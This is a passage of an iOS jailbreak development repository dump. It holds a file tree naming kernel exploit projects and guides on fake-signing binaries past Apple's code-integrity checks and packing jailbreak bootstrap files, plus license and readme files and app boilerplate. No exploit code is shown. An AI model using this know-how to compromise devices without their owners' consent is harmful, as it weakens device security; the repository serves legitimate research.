├── .gitignore
├── .gitmodules
├── Documentation
├── CodeSign Tools.md
├── Packing a .TAR file for bianries.md
└── readme.md
├── IDA Disassembler Scripts
└── Other IDA Scripts
├── Jailbreak Frameworks
├── iOS 11
│ ├── QiLin
│ │ ├── .DS_Store
│ │ ├── LICENSE.MD
│ │ ├── QiLin.h
│ │ ├── qilin12.o
│ │ └── readme.md
│ └── readme.md
├── iOS 12
│ ├── QiLin
│ │ ├── LICENSE.MD
│ │ ├── QiLin.h
│ │ ├── qilin12.o
│ │ └── readme.md
│ ├── jelbrekLIB
│ │ └── readme.md
│ └── readme.md
└── readme.md
├── Jailbreak Reading Materials
├── literature.md
└── readme.md
├── LICENSE
├── README.md
├── Tools
├── iometa
│ └── readme.md
├── joker
│ ├── joker.tar
│ └── readme.md
└── jtool2
│ └── jtool2.tgz
├── Tweak Development
└── readme.md
├── iOS Device Support
└── readme.md
└── iOS Exploits Collection
├── iOS 11
├── readme.md
└── tfp0 Kernel Exploits
│ ├── async_wake
│ ├── .gitignore
│ ├── README
│ └── async_wake_ios
│ │ ├── AppDelegate.h
│ │ ├── AppDelegate.m
│ │ ├── Assets.xcassets
│ │ └── AppIcon.appiconset
│ │ │ └── Contents.json
│ │ ├── Base.lproj
│ │ ├── LaunchScreen.storyboard
│ │ └── Main.storyboard
│ │ ├── Info.plist
│ │ ├── ViewController.h
│ │ ├── ViewController.m
│ │ ├── arm64_state.h
│ │ ├── async_wake.c
│ │ ├── async_wake.h
│ │ ├── com.apple.iokit.IOMobileGraphicsFamily.plist
│ │ ├── early_kalloc.c
│ │ ├── early_kalloc.h
│ │ ├── find_port.c
│ │ ├── find_port.h
│ │ ├── kcall.c
│ │ ├── kcall.h
│ │ ├── kdbg.c
│ │ ├── kdbg.h
│ │ ├── kmem.c
│ │ ├── kmem.h
│ │ ├── kutils.c
│ │ ├── kutils.h
│ │ ├── main.m
│ │ ├── symbols.c
│ │ └── symbols.h
│ └── multi_path
│ ├── README.md
│ ├── multi_path.xcodeproj
│ ├── project.pbxproj
│ ├── project.xcworkspace
│ │ ├── contents.xcworkspacedata
│ │ ├── xcshareddata
│ │ │ └── IDEWorkspaceChecks.plist
│ │ └── xcuserdata
│ │ │ ├── ianbeer.xcuserdatad
│ │ │ └── UserInterfaceState.xcuserstate
│ │ │ └── jakejames.xcuserdatad
│ │ │ └── UserInterfaceState.xcuserstate
│ └── xcuserdata
│ │ ├── ianbeer.xcuserdatad
│ │ └── xcschemes
│ │ │ └── xcschememanagement.plist
│ │ └── jakejames.xcuserdatad
│ │ └── xcschemes
│ │ └── xcschememanagement.plist
│ └── multi_path
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── Assets.xcassets
│ └── AppIcon.appiconset
│ │ └── Contents.json
│ ├── Base.lproj
│ ├── LaunchScreen.storyboard
│ └── Main.storyboard
│ ├── Info.plist
│ ├── ViewController.h
│ ├── ViewController.m
│ ├── jelbrek
│ ├── jelbrek.h
│ ├── jelbrek.m
│ ├── kern_utils.h
│ ├── kern_utils.m
│ ├── libjb.h
│ ├── libjb.m
│ ├── offsetof.c
│ ├── offsetof.h
│ ├── patchfinder64.h
│ └── patchfinder64.m
│ ├── kmem.h
│ ├── main.m
│ ├── multi_path.entitlements
│ ├── offsets.h
│ ├── offsets.m
│ ├── sploit.c
│ └── sploit.h
├── iOS 12
├── readme.md
└── tfp0 Kernel Exploits
│ ├── readme.md
│ └── sock_port
│ ├── LICENSE
│ ├── Makefile
│ ├── README.md
│ ├── sock_port.pdf
│ ├── sock_port.xcodeproj
│ ├── project.pbxproj
│ ├── project.xcworkspace
│ │ ├── contents.xcworkspacedata
│ │ ├── xcshareddata
│ │ │ └── IDEWorkspaceChecks.plist
│ │ └── xcuserdata
│ │ │ ├── jakejames.xcuserdatad
│ │ │ └── UserInterfaceState.xcuserstate
│ │ │ └── pwn20wnd.xcuserdatad
│ │ │ └── UserInterfaceState.xcuserstate
│ ├── xcshareddata
│ │ └── xcschemes
│ │ │ └── sock_port.xcscheme
│ └── xcuserdata
│ │ ├── jakejames.xcuserdatad
│ │ ├── xcdebugger
│ │ │ └── Breakpoints_v2.xcbkptlist
│ │ └── xcschemes
│ │ │ └── xcschememanagement.plist
│ │ └── pwn20wnd.xcuserdatad
│ │ └── xcschemes
│ │ └── xcschememanagement.plist
│ ├── sock_port
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── Assets.xcassets
│ │ └── AppIcon.appiconset
│ │ │ └── Contents.json
│ ├── Base.lproj
│ │ ├── LaunchScreen.storyboard
│ │ └── Main.storyboard
│ ├── Info.plist
│ ├── ViewController.h
│ ├── ViewController.m
│ ├── exploit.c
│ ├── exploit.h
│ ├── exploit_utilities.c
│ ├── exploit_utilities.h
│ ├── include
│ │ └── IOKit
│ │ │ ├── IOKitKeys.h
│ │ │ ├── IOKitLib.h
│ │ │ ├── IOReturn.h
│ │ │ ├── IOTypes.h
│ │ │ └── OSMessageNotification.h
│ ├── iosurface.c
│ ├── iosurface.h
│ ├── kernel_memory.c
│ ├── kernel_memory.h
│ ├── main.m
│ ├── offsets.h
│ └── offsets.m
│ ├── sock_port_UITests
│ ├── Info.plist
│ └── socket_freeUITests.m
│ └── sock_port_tests
│ ├── Info.plist
│ └── socket_freeTests.m
└── iOS 13
├── readme.md
└── tfp0 Kernel Exploits
├── readme.md
└── time_waste
├── LICENSE
├── README.md
├── time_waste.xcodeproj
├── project.pbxproj
├── project.xcworkspace
│ ├── contents.xcworkspacedata
│ ├── xcshareddata
│ │ └── IDEWorkspaceChecks.plist
│ └── xcuserdata
│ │ └── jakejames.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
└── xcuserdata
│ └── jakejames.xcuserdatad
│ ├── xcdebugger
│ └── Breakpoints_v2.xcbkptlist
│ └── xcschemes
│ └── xcschememanagement.plist
├── time_waste
├── AppDelegate.h
├── AppDelegate.m
├── Assets.xcassets
│ ├── AppIcon.appiconset
│ │ └── Contents.json
│ └── Contents.json
├── Base.lproj
│ ├── LaunchScreen.storyboard
│ └── Main.storyboard
├── IOAccelerator_stuff.c
├── IOAccelerator_stuff.h
├── IOKit
│ ├── IOKit.tbd
│ ├── IOKitKeys.h
│ ├── IOKitLib.h
│ ├── IOReturn.h
│ ├── IOTypes.h
│ ├── OSMessageNotification.h
│ └── Readme.md
├── IOSurface_stuff.c
├── IOSurface_stuff.h
├── Info.plist
├── ViewController.h
├── ViewController.m
├── exploit.c
├── exploit.h
├── exploit_utilities.c
├── exploit_utilities.h
├── kernel_memory.c
├── kernel_memory.h
├── main.m
├── offsets.h
└── offsets.m
├── time_wasteTests
├── Info.plist
└── time_wasteTests.m
└── time_wasteUITests
├── Info.plist
└── time_wasteUITests.m
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "Tools/iometa/iometa"]
2 | path = Tools/iometa/iometa
3 | url = https://github.com/Siguza/iometa
4 | branch = master
5 | [submodule "Jailbreak Frameworks/iOS 12/jelbrekLIB/jelbrekLib"]
6 | path = Jailbreak Frameworks/iOS 12/jelbrekLIB/jelbrekLib
7 | url = https://github.com/jakeajames/jelbrekLib
8 | branch = master
9 | [submodule "Tweak Development/theos"]
10 | path = Tweak Development/theos
11 | url = https://github.com/theos/theos
12 | branch = master
13 | [submodule "iOS Device Support/iOS-DeviceSupport"]
14 | path = iOS Device Support/iOS-DeviceSupport
15 | url = https://github.com/iGhibli/iOS-DeviceSupport
16 | [submodule "IDA Disassembler Scripts/ida_kernelcache"]
17 | path = IDA Disassembler Scripts/ida_kernelcache
18 | url = https://github.com/bazad/ida_kernelcache
19 | [submodule "IDA Disassembler Scripts/IDA-IOS-Toolkit"]
20 | path = IDA Disassembler Scripts/IDA-IOS-Toolkit
21 | url = https://github.com/stefanesser/IDA-IOS-Toolkit
22 | [submodule "IDA Disassembler Scripts/IDA-Scripts-1"]
23 | path = IDA Disassembler Scripts/IDA-Scripts-1
24 | url = https://github.com/nihilus/IDA-Scripts-1
25 |
--------------------------------------------------------------------------------
/Documentation/CodeSign Tools.md:
--------------------------------------------------------------------------------
1 | Starting with iOS 12, Apple introduced CoreTrust, which ensures that the binary you attempt to run (being it a full blown .app file or just a Mach-O binary) has a valid CodeSign blob with a valid ``Apple Developer Relations certificate``.
2 |
3 | Starting with CoreTrust on iOS 12, in order for a binary to not be killed by AMFI (Apple Mobile File Integrity) on the spot with the dreaded "Killed: 9" error, it must:
4 |
5 | * Have a valid CodeSign blob.
6 | * Have a valid certificate embedded in it.
7 | * Have a SHA-256 hash embedded (other variants still produce the crash, some older tools sign with SHA-128, not good).
8 | * Have the right entitlements embedded into it.
9 | * Not violate entitlements policies (AMFI won't just let you slap any entitlement on yourself if you aren't platform!).
10 |
11 | ## Tools for fake-signing
12 | For properly code-signing the base binaries for the jailbreak I personally use jtool2 created by Jonathan Levin. It does sign properly (SHA-256) (fake signing), but if you use it to sign your binaries, you must add all of them to AMFI's dynamic TrustCache which may or may not be a good idea depending on the scale of your jailbreak.
13 |
14 | * Jtool2 can be found here: http://www.newosxbook.com/tools/jtool.html
15 |
16 | ### Example signing with jtool2, with an entitlements XML file:
17 | `jtool2 --sign --ent Entitlements.xml /Users/geosn0w/Desktop/dropbear`
18 |
19 | ### Checking the signature of a Mach-O binary with jtool2:
20 | `jtool2 --sig --ent /Users/geosn0w/Desktop/dropbear`
21 |
22 | ## Tools for real-signing (as in, signing with certificate and all that)
23 | This has the advantage that you don't necessarily need to add every single binary to AMFI's TrustCache, but you do need a real Apple certificate. A p12 or even your own Apple Developer ID.
24 |
25 | For this I usually use codesign (built-in on macOS). It does allow you to add entitlements from an XML file which is neat, and it allows you to select a signing identity from the Keychain.
26 |
27 | For more info on the usage, run `man codesign` in Terminal.
28 |
29 | ## For questions:
30 |
31 | * GeoSn0w (@FCE365): https://twitter.com/FCE365
32 | * YouTube: iDevice Central: https://www.youtube.com/fce365official
33 |
--------------------------------------------------------------------------------
/Documentation/Packing a .TAR file for bianries.md:
--------------------------------------------------------------------------------
1 | When building your jailbreak, you will likely need to deploy the base binaries of the jailbreak to the device when the jailbreak installs. This includes the standard `UNIX` binaries, `SSH` (Dropbear), and other command line tools you may want deployed, like `DPKG` and `APT`.
2 |
3 | Most if not all jailbreaks use .TAR archives to deploy these. Having a few dozen Mach-O binaries in the root folder of the Xcode project and manually copying them one by one is not a great idea, so tarring them is a good solution.
4 |
5 | ## Common issues when creating a bootstrap or base binaries tar file:
6 |
7 | * You may accidentally include directory (folder) structures.
8 | * You may add .DS_Store files or other annoying ".*" files.
9 |
10 | ## How to properly TAR your binaries (macOS).
11 |
12 | 1) Make a new folder on Desktop, call it basebins, then make another folder inside it and call it `jb`.
13 | 2) Inside the `jb` folder, add all the binaries you want with their proper folders and everything just like you want them to appear on the ROOT FS of the device. Make sure to not overwrite anything (don't make `/var` `/private` `/system` etc. folders yet).
14 | 3) Open Terminal and `cd` into the newly made `basebins` folder.
15 | 4) Run `tar cvf basebins.tar --exclude=".*" ./jb/`
16 | 5) This should create a new .tar file with all the binaries but not with .DS_Store, etc.
17 |
18 | ## For questions:
19 |
20 | * GeoSn0w (@FCE365): https://twitter.com/FCE365
21 | * YouTube: iDevice Central: https://www.youtube.com/fce365official
22 |
--------------------------------------------------------------------------------
/Documentation/readme.md:
--------------------------------------------------------------------------------
1 | The files here represent common tools / stuff used for both iOS 13 and iOS 12 and possibly other iOS versions.
2 |
--------------------------------------------------------------------------------
/IDA Disassembler Scripts/Other IDA Scripts:
--------------------------------------------------------------------------------
1 | There are some other iOS IDA scripts but are older:
2 |
3 | * https://github.com/nihilus/IDA-Scripts-1
4 | * https://libraries.io/github/stefanesser/IDA-IOS-Toolkit
5 |
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 11/QiLin/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Jailbreak Frameworks/iOS 11/QiLin/.DS_Store
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 11/QiLin/LICENSE.MD:
--------------------------------------------------------------------------------
1 | Johnny's (semi) open source license, v0.4
2 | -----------------------------------------
3 |
4 | This is (well, will be, at the time of writing) open source, and I can't but appeal to your sense of decency.
5 | You might try compile this and try to pass it as your own. Heck, you might even try to run it through llvm-obfuscator.
6 | But that would be stealing code. And obfuscate as you will, you can't obfuscate enough to hide the methods.
7 | So, primum non nocere. Do no harm, and do not steal.
8 |
9 | To be fully clear:
10 |
11 | - Yes, you may use this source or code library as you see fit, PROVIDED THAT:
12 |
13 | - IT IS NOT USED COMMERCIALLY IN ANY WAY. For this, I ask that you contact my company, @Technologeeks,
14 | and ask for proper licensing - they'll also provide official support.
15 |
16 | - IT IS NOT USED AS A COMPONENT OF AN APT IN ANY KIND FORM OR MANNER.
17 | (NSO/Hackin9/Finfisher/Equus/etc - that means you)
18 |
19 | - WHEN YOU DO USE IT, I ASK THAT YOU MENTION THAT YOUR TOOL IS "powered by the QiLin Toolkit",
20 | or otherwise provide a user facing indication that it is using this code.
21 | I'd appreciate it if you tweeted with #QiLin, too.
22 |
23 | - If you spread lies about other people, propaganda or false claims, while using this toolkit,
24 | then you must renounce your ways, and apologize. Then you can use it freely.
25 |
26 | - There are no limitation on nationality, specific people exclusions (i.e. this is AISE, subject to last condition, above ;-),
27 | or any other race, color or creed - provided the above are met.
28 |
29 |
30 | - QiLin comes with NO LIABILITY WHATSOEVER. YOU USE THIS AT YOUR OWN RISK.
31 |
32 | I CANNOT AND WILL NOT BE HELD ACCOUNTABLE FOR ANY DAMAGE, SOFTWARE OR HARDWARE OR YOUR DATA OR OTHERWISE,
33 |
34 | WHICH MAY OR MAY NOT RESULT TO YOUR IOS DEVICE BY USING THIS.
35 |
36 | - Remember I'm doing this AS A FAVOR. I AM NO IN WAY INDEBTED OR COMMITTED TO SUPPORT THIS, OR ANY OTHER OF MY TOOLS.
37 | You don't have to thank for this (you're welcome) but please don't slander me either.
38 |
39 | - Should you wish to contribute/donate, you may do so in one of the following ways:
40 |
41 | - Monetary: Pick a charity. Any charity. Of your choice. Pay them however money you want.
42 | Optionally, tweet/fb/insta/snap-whatever a screen capture stating "#QiLin".
43 |
44 | - Development: Through http://NewOSXBook.com/forum - you are welcome to ask (proper technical, not lame wen eta)
45 | questions and engage in discussions
46 |
47 |
48 |
49 | First, do no harm. Next, have fun :-)
50 |
51 | Changelog:
52 |
53 | - v0.1 Was AISE but SE is being more of an ass than usual and slandering fake claims directly attacking me.
54 | So this was updated with new condition excluding him until he grows up and behaves like the decent,
55 | talented researcher he can be.
56 |
57 | - v0.3 adds request to tweet #QiLin.
58 |
59 | - v0.4 states what should be obvious - NO LIABILITY WHATSOEVER
60 |
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 11/QiLin/qilin12.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Jailbreak Frameworks/iOS 11/QiLin/qilin12.o
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 11/QiLin/readme.md:
--------------------------------------------------------------------------------
1 | This is the first ever plug-and-play Jailbreak Framework. It was developed by Jonathan Levin, the author of the *OS Internals books.
2 |
3 | By his description:
4 |
5 | "All you have to do in order to build on QiLin is to call: int initQiLin (mach_port_t TFP0, uint64_t KernelBase); with the kernel send right (TFP0) and the kernelbase (i.e address of kernel Mach-O + slide). And now you don't even have to do that anymore since QiLin can figure out the slide with just your own task address (which exploits use anyway). The rest is provided by numerous functions."
6 |
7 |
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 11/readme.md:
--------------------------------------------------------------------------------
1 | The QiLin toolkit was initially released for iOS 11 by Jonathan Levin, and then ported to iOS 12. Using it on iOS 11 would work, assuming a proper tfp0 exploit for iOS 11 is used. However, the remount technique is different. While you can use QiLin's built-in remount for iOS 11, on iOS 12 with the introduction of APFS snapshots, the remount from QiLin is totally broken (was supposed to get a fix at the time as Jonathan told me, but that never happened unfortunately). That was back in 2019 - chances it will ever be fixed are slim since QiLin is closed source and J has lost interest in it for now.
2 |
3 | So, if you are building an iOS 11 up to iOS 12 jailbreak using this, for iOS 11 use the built-in QiLin remount, while for iOS 12 you need a separate one like the one used in Unc0ver.
4 |
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 12/QiLin/LICENSE.MD:
--------------------------------------------------------------------------------
1 | Johnny's (semi) open source license, v0.4
2 | -----------------------------------------
3 |
4 | This is (well, will be, at the time of writing) open source, and I can't but appeal to your sense of decency.
5 | You might try compile this and try to pass it as your own. Heck, you might even try to run it through llvm-obfuscator.
6 | But that would be stealing code. And obfuscate as you will, you can't obfuscate enough to hide the methods.
7 | So, primum non nocere. Do no harm, and do not steal.
8 |
9 | To be fully clear:
10 |
11 | - Yes, you may use this source or code library as you see fit, PROVIDED THAT:
12 |
13 | - IT IS NOT USED COMMERCIALLY IN ANY WAY. For this, I ask that you contact my company, @Technologeeks,
14 | and ask for proper licensing - they'll also provide official support.
15 |
16 | - IT IS NOT USED AS A COMPONENT OF AN APT IN ANY KIND FORM OR MANNER.
17 | (NSO/Hackin9/Finfisher/Equus/etc - that means you)
18 |
19 | - WHEN YOU DO USE IT, I ASK THAT YOU MENTION THAT YOUR TOOL IS "powered by the QiLin Toolkit",
20 | or otherwise provide a user facing indication that it is using this code.
21 | I'd appreciate it if you tweeted with #QiLin, too.
22 |
23 | - If you spread lies about other people, propaganda or false claims, while using this toolkit,
24 | then you must renounce your ways, and apologize. Then you can use it freely.
25 |
26 | - There are no limitation on nationality, specific people exclusions (i.e. this is AISE, subject to last condition, above ;-),
27 | or any other race, color or creed - provided the above are met.
28 |
29 |
30 | - QiLin comes with NO LIABILITY WHATSOEVER. YOU USE THIS AT YOUR OWN RISK.
31 |
32 | I CANNOT AND WILL NOT BE HELD ACCOUNTABLE FOR ANY DAMAGE, SOFTWARE OR HARDWARE OR YOUR DATA OR OTHERWISE,
33 |
34 | WHICH MAY OR MAY NOT RESULT TO YOUR IOS DEVICE BY USING THIS.
35 |
36 | - Remember I'm doing this AS A FAVOR. I AM NO IN WAY INDEBTED OR COMMITTED TO SUPPORT THIS, OR ANY OTHER OF MY TOOLS.
37 | You don't have to thank for this (you're welcome) but please don't slander me either.
38 |
39 | - Should you wish to contribute/donate, you may do so in one of the following ways:
40 |
41 | - Monetary: Pick a charity. Any charity. Of your choice. Pay them however money you want.
42 | Optionally, tweet/fb/insta/snap-whatever a screen capture stating "#QiLin".
43 |
44 | - Development: Through http://NewOSXBook.com/forum - you are welcome to ask (proper technical, not lame wen eta)
45 | questions and engage in discussions
46 |
47 |
48 |
49 | First, do no harm. Next, have fun :-)
50 |
51 | Changelog:
52 |
53 | - v0.1 Was AISE but SE is being more of an ass than usual and slandering fake claims directly attacking me.
54 | So this was updated with new condition excluding him until he grows up and behaves like the decent,
55 | talented researcher he can be.
56 |
57 | - v0.3 adds request to tweet #QiLin.
58 |
59 | - v0.4 states what should be obvious - NO LIABILITY WHATSOEVER
60 |
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 12/QiLin/qilin12.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Jailbreak Frameworks/iOS 12/QiLin/qilin12.o
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 12/QiLin/readme.md:
--------------------------------------------------------------------------------
1 | This is the first ever plug-and-play Jailbreak Framework. It was developed by Jonathan Levin, the author of the *OS Internals books.
2 |
3 | By his description:
4 |
5 | "All you have to do in order to build on QiLin is to call: int initQiLin (mach_port_t TFP0, uint64_t KernelBase); with the kernel send right (TFP0) and the kernelbase (i.e address of kernel Mach-O + slide). And now you don't even have to do that anymore since QiLin can figure out the slide with just your own task address (which exploits use anyway). The rest is provided by numerous functions."
6 |
7 |
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 12/jelbrekLIB/readme.md:
--------------------------------------------------------------------------------
1 | This is jelbrekLIB - while it is currently discontinued, it should hold for an iOS 12.0 to maybe iOS 12.4? Jailbreak. (Offsets may need tweaking)
2 |
--------------------------------------------------------------------------------
/Jailbreak Frameworks/iOS 12/readme.md:
--------------------------------------------------------------------------------
1 | For iOS 12 up to 12.4-ish? Maybe even more, you can use two frameworks, one at a time. One of them (JelbrekLIB) is open source, while the other is not (QiLin). They both work well, but QiLin being closed-source and largely abandoned, tends to be a pain to fix if there is a bug.
2 |
--------------------------------------------------------------------------------
/Jailbreak Frameworks/readme.md:
--------------------------------------------------------------------------------
1 | These are pre-made jailbreak frameworks used to create quick jailbreak tools. They tend to have most code built-in, only requiring a tfp0 exploit to be plugged in and the kernel task port (task_port_t variable) to be passed to it at initialization. Refer to the individual documentation for details on how to use them.
2 |
--------------------------------------------------------------------------------
/Jailbreak Reading Materials/literature.md:
--------------------------------------------------------------------------------
1 | ### Currently available literature in the repo
2 |
3 | * GeoSn0w's blog: https://geosn0w.github.io
4 | * Siguza's Blog: https://siguza.github.io
5 | * Google Project Zero Blog (very good exploit write-ups): https://googleprojectzero.blogspot.com
6 | * Apple Developer Portal: https://developer.apple.com
7 | * The NewOSXBooks Forum: http://newosxbook.com/forum/index.php
8 | * ZecOPS' Vulnerabilities Blog (Great write-ups): https://blog.zecops.com/vulnerabilities
9 | * Siguza's iOS Resources (plenty of good stuff): https://github.com/Siguza/ios-resources
10 | * Pangu's BlackBird SEP Exploit and Presentation: https://t.co/rk6Jnzfyuj?amp=1
11 |
12 | ### SEP (Secure Enclave Processor)
13 |
14 | * Demystifying the Secure Enclave Processor (2016): https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf
15 |
16 | ### Jailbreak walkthroughs:
17 |
18 | * How was rootlessJB (iOS 11 - 11.3.1) built: https://github.com/jakeajames/rootlessJB/blob/master/writeup.pdf
19 |
20 | MORE TO COME
21 |
--------------------------------------------------------------------------------
/Jailbreak Reading Materials/readme.md:
--------------------------------------------------------------------------------
1 | This section contains blogs, pdfs, repos with literature, books, documentation, etc.
2 | Everything that can help you understand various jailbreak processes. May also include videos (from BlackHat, etc.) if they explain certain aspects very well.
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # OpenJailbreak
2 | GeoSn0w's OpenJailbreak Project, an open-source iOS 11 to iOS 16 Jailbreak project with documentation of the steps involved, all the tools used, exploits and more.
3 |
4 | See this is as a Jailbreak Development Vault.
5 |
6 | ## To clone this repo properly:
7 | ```
8 | git clone --recursive https://github.com/GeoSn0w/OpenJailbreak.git
9 | ```
10 |
11 | ## This is the beginning of something truly amazing. Stay tuned!
12 |
13 | ## Find me on Social Media
14 |
15 | * Twitter: @FCE365
16 | * YouTube Channel: iDevice Central (Formerly F.C.E. 365 TV - iDevice Central)
17 |
18 | ### My Websites
19 | * Latest iOS 16 Jailbreak News
20 | * Latest Gaming News & Guides
21 | * iOS Jailbreak Forum
22 | * Latest FRP Bypass Tools & Guides
23 |
--------------------------------------------------------------------------------
/Tools/iometa/readme.md:
--------------------------------------------------------------------------------
1 | Extracts C++ class runtime information from an arm64 iOS kernel.
2 | Class names, inheritance, vtables, methods, etc.
3 |
--------------------------------------------------------------------------------
/Tools/joker/joker.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Tools/joker/joker.tar
--------------------------------------------------------------------------------
/Tools/joker/readme.md:
--------------------------------------------------------------------------------
1 | Deprecated! The functionality of joker is now built-in to Jtool2 when used with --analyze on any kernelcache
2 |
3 | This is basically used to analyze iOS Kernels. It aids in iOS / macOS Kernel Reverse Engineering, but it is legacy software. Most of its functionality is now part of jtool2. Just in case you need it, however, it is here.
4 |
5 | ### Documentation
6 |
7 | Official documentation and how to use it: http://www.newosxbook.com/tools/joker.html
8 |
--------------------------------------------------------------------------------
/Tools/jtool2/jtool2.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Tools/jtool2/jtool2.tgz
--------------------------------------------------------------------------------
/Tweak Development/readme.md:
--------------------------------------------------------------------------------
1 | This section contains Jailbreak Tweaks Development tools.
2 |
3 | ### Index
4 |
5 | * Theos - This is used to compile the tweaks on both iOS and macOS. Can be used to built the actual tweaks in an usable format.
6 | Please refer to the documentation.
7 |
--------------------------------------------------------------------------------
/iOS Device Support/readme.md:
--------------------------------------------------------------------------------
1 | ### Legacy Xcode Support Files
2 |
3 | This is a collection of Xcode iOS Support files which allow you to use an older Xcode version* to test your jailbreak tool even if you use an older macOS.
4 | For example, I use macOS High Sierra on an iMac 2011, running Xcode 10.1 as the latest supported version. This is OLD. Naturally it wouldn't support my iOS 13 devices, let alone my iOS 14 Beta ones. Adding the support files allows me to write code for much newer iOS than the default supported by my Xcode.
5 |
6 | This is rather useful if you're doing iOS development on a budget and you cannot afford a newer Mac or Macbook to have the latest Xcode.
7 |
8 | * In some cases iOS support files are not enough and you may also need a new SDK from a newer Xcode to support newer CPUs (i.e. A12 and A13).
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/readme.md:
--------------------------------------------------------------------------------
1 | This folder contains the tfp0 kernel exploit(s) used for iOS 11 jailbreak purposes.
2 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/.gitignore:
--------------------------------------------------------------------------------
1 | # Created by https://www.gitignore.io/api/macos,xcode
2 |
3 | ### macOS ###
4 | *.DS_Store
5 | .AppleDouble
6 | .LSOverride
7 |
8 | # Icon must end with two \r
9 | Icon
10 |
11 | # Thumbnails
12 | ._*
13 |
14 | # Files that might appear in the root of a volume
15 | .DocumentRevisions-V100
16 | .fseventsd
17 | .Spotlight-V100
18 | .TemporaryItems
19 | .Trashes
20 | .VolumeIcon.icns
21 | .com.apple.timemachine.donotpresent
22 |
23 | # Directories potentially created on remote AFP share
24 | .AppleDB
25 | .AppleDesktop
26 | Network Trash Folder
27 | Temporary Items
28 | .apdisk
29 |
30 | ### Xcode ###
31 | # Xcode
32 | #
33 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore
34 |
35 | ## Build generated
36 | build/
37 | DerivedData/
38 |
39 | ## Various settings
40 | *.pbxuser
41 | !default.pbxuser
42 | *.mode1v3
43 | !default.mode1v3
44 | *.mode2v3
45 | !default.mode2v3
46 | *.perspectivev3
47 | !default.perspectivev3
48 | xcuserdata/
49 |
50 | ## Other
51 | *.moved-aside
52 | *.xccheckout
53 | *.xcscmblueprint
54 |
55 | ### Xcode Patch ###
56 | *.xcodeproj/*
57 | !*.xcodeproj/project.pbxproj
58 | !*.xcodeproj/xcshareddata/
59 | !*.xcworkspace/contents.xcworkspacedata
60 | /*.gcno
61 |
62 | # End of https://www.gitignore.io/api/macos,xcode
63 |
64 | async_wake_ios.xcodeproj/project.pbxproj
65 | async_wake_ios.xcodeproj/project.pbxproj
66 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/AppDelegate.h:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | @interface AppDelegate : UIResponder
4 |
5 | @property (strong, nonatomic) UIWindow *window;
6 |
7 |
8 | @end
9 |
10 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/AppDelegate.m:
--------------------------------------------------------------------------------
1 | #import "AppDelegate.h"
2 | #include "async_wake.h"
3 |
4 | @interface AppDelegate ()
5 |
6 | @end
7 |
8 | @implementation AppDelegate
9 |
10 |
11 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
12 | // Override point for customization after application launch.
13 | //go();
14 | return YES;
15 | }
16 |
17 |
18 | - (void)applicationWillResignActive:(UIApplication *)application {
19 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
20 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
21 | }
22 |
23 |
24 | - (void)applicationDidEnterBackground:(UIApplication *)application {
25 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
26 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
27 | }
28 |
29 |
30 | - (void)applicationWillEnterForeground:(UIApplication *)application {
31 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
32 | }
33 |
34 |
35 | - (void)applicationDidBecomeActive:(UIApplication *)application {
36 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
37 | }
38 |
39 |
40 | - (void)applicationWillTerminate:(UIApplication *)application {
41 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
42 | }
43 |
44 |
45 | @end
46 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "iphone",
5 | "size" : "20x20",
6 | "scale" : "2x"
7 | },
8 | {
9 | "idiom" : "iphone",
10 | "size" : "20x20",
11 | "scale" : "3x"
12 | },
13 | {
